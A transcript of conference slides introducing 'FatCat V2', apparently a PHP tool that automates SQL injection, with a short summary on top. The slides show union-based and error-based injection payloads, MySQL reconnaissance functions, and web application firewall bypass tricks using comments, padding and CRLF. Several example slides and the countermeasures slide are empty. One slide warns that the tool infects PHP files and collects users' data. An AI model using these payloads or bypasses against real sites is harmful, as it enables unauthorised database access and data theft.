The document introduces 'fatcat v2', an automatic web SQL injector developed by Sandeep Kamble, aimed at aiding security researchers in testing for SQL injection vulnerabilities and bypassing web application firewalls. It outlines various techniques for SQL injection, including normal and error-based methods, as well as strategies for gathering database and server information. The document includes a warning that using the tool could compromise sensitive data and emphasizes its intended use purely for security research.

1. FatCat V2– Automatic Web [S]QL-Injector
Sandeep Kamble AKA [S]
Parason INC
Blog : http://sandeepkamble.com
Twitter: @SandeepL337

2. #
/usr/bin/whoami
•Narcissistic Vulnerability Pimp (aka Security
Researcher for fun)
•Listed in Google , Facebook , Twitter , Drop box ,
Cloud flare , 500px , Lynda.com , Central Desktop
Security Pages.
•Ahhh ? What are those Vulnerabilities
•Member of Garage4hackers.com & you can find
POC @G4h.

3. Index
•Introducing FatCat Beta 2
•SQL Injection in Brief
• FatCat Injgredients
1) DB Information & server Information gathering.
2) Normal SQL injection.
3) Error Based SQL injection.
4) WAF (Web Application Firewall)Bypass functions.
•C-Style Mysql comment WAF Bypass
•Buffer overflow WAF Bypass
•CRLF WAF Bypass
•Bypass with Information_schema.statics
•Bypass with Information_schema.key_column_usage
5) Countermeasures
6) Demo

4. Provide Good Advise for Good
People
Warning! : FatCat is being used for security
research. All PHP files will be infected and all
yours data will be collected. If you want to be
safe, don't use this Tool. If you do that, don't
send sensitive information. If after all you
continue, do it on your own risk

5. Ladies gentleman introducing
FatCat V2
1) It’s New , it’s cool to use , inject web!
2) Normal SQL injection
3) Error Based SQL injection
4) WAF (Web application firewall ) Bypass function.
5) Helpful to Pentester – You can create POC from
anywhere .
6) It supports Mysql 5.0
7) Developed in PHP
8) FatCat made 3400+ Downloads on Code.google.com

6. SQL injection in Brief
It’s me .. Hi, :/
“SQL Injection happens when user
manipulate input & form a SQL Query. “
Sending payload !@#$%^&*()

7. FatCat Ingredients
1) DB Information & server Information gathering.
2) Normal SQL injection.
3) Error Based SQL injection.
4) WAF (Web Application Firewall)Bypass functions.

8. FatCat Ingredients
1) DB Information & server Information gathering.
By using MYSQL Statement , Db & Server information can be gathered
1. Finding Total Column Count 9. Max allowed Packet size
• Order by n+1; • @@max_allowed_packet
2. Finding MySQL Version function
• VERSION () Function
3. Finding current User
• User() Function
4. Finding Data Directory
• @@datadir Function
5. Finding Base Directory
• @@basedir Function
6. Finding Host Name
• @@hostname Function
7. Finding Operating System
• @@version_compile_os Function
8. Finding Current Database name
• Database() Function

9. FatCat Ingredients
1) Normal SQL injection
•It is also Know as Union SQL injection
•Union help us to combine two result set of the select statement
•Eg: Id=-2+Union+select+13371,13372,13373,13374-- -

10. FatCat Ingredients
2) Error based SQL injection
•It is also Know as Double Query SQL injection
•Some times union based SQLi get fails that time you can use Error based SQLi
• A query which confuse the DB engine and produce helpful mysql errors
•Eg: select gmailid,(select password from id where id=9)
As Google_India from id;
Aww .. ! Double Query
duplicate entry '~‘Clubhack_screte'~1' for
key 1
Sending payload !@#$W00T%^&*()
FatCat web interface

11. FatCat Ingredients
3) WAF (Web application Firewall) Bypass ?

12. FatCat Ingredients
1. Protection Against OWASP Top Ten!
2. Types of Vulnerabilities it can prevent.
3. Brute Force protection.
In simple language , It’s Monitor HTTP conversation

13. FatCat Ingredients
3) WAF (Web application Firewall) Bypass
•We use Following Methods to bypass WAF
•C-Style Mysql comment WAF Bypass
•Buffer overflow WAF Bypass
•CRLF WAF Bypass
•Bypass with Information_schema.statics
•Bypass with Information_schema.key_column_usage
•Linux Based WAFS
•AppArmor
•ModSecurity - Also works under Mac OS X, Solaris and other
versions of Unix.
•Systrace
•Zorp

14. FatCat Ingredients
3) WAF (Web application Firewall) Bypass
1. Mysql Comment WAF bypass
•Syntax /*! Mysql Statements */
•Example

15. FatCat Ingredients
3) WAF (Webapplication Firwall) Bypass
1. Buffer Overflow WAF bypass
•Syntax : ‘ AAAAAAAAAAAAAAAAAAAAAAAAAAAA Mysql Statement
•Example:

16. FatCat Ingredients
3) WAF (Webapplication Firwall) Bypass
1. CRLF WAF Bypass
Syntax : %0A%0D+Mysql Statements+%0A%0
Example :

17. FatCat Ingredients
3) WAF (Webapplication Firwall) Bypass
1. Bypass with information_schema.key_column_usage
Example :

18. FatCat Ingredients
3) WAF (Webapplication Firwall) Bypass
1. Bypass with information_schema.statics
Example :

19. Countermeasures for SQLI

20. Lets Inject with FatCat

21. Any Questions ?
A Gentleman never asks.
A Lady never tells.

22. Thank you !
</presentation>